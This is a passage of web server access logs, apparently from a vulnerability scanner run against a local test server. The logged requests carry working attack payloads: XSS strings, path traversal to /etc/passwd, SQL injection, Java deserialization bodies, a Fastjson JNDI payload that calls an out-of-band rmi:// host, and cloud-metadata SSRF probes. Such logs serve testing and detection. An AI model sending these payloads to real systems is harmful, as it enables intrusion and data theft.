6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29K9NJUHNvCdJj43P0P0vRbzqDP')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca281d8smpvb9r2g07h0xh6tk8ua6ke3r.oast.site/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", 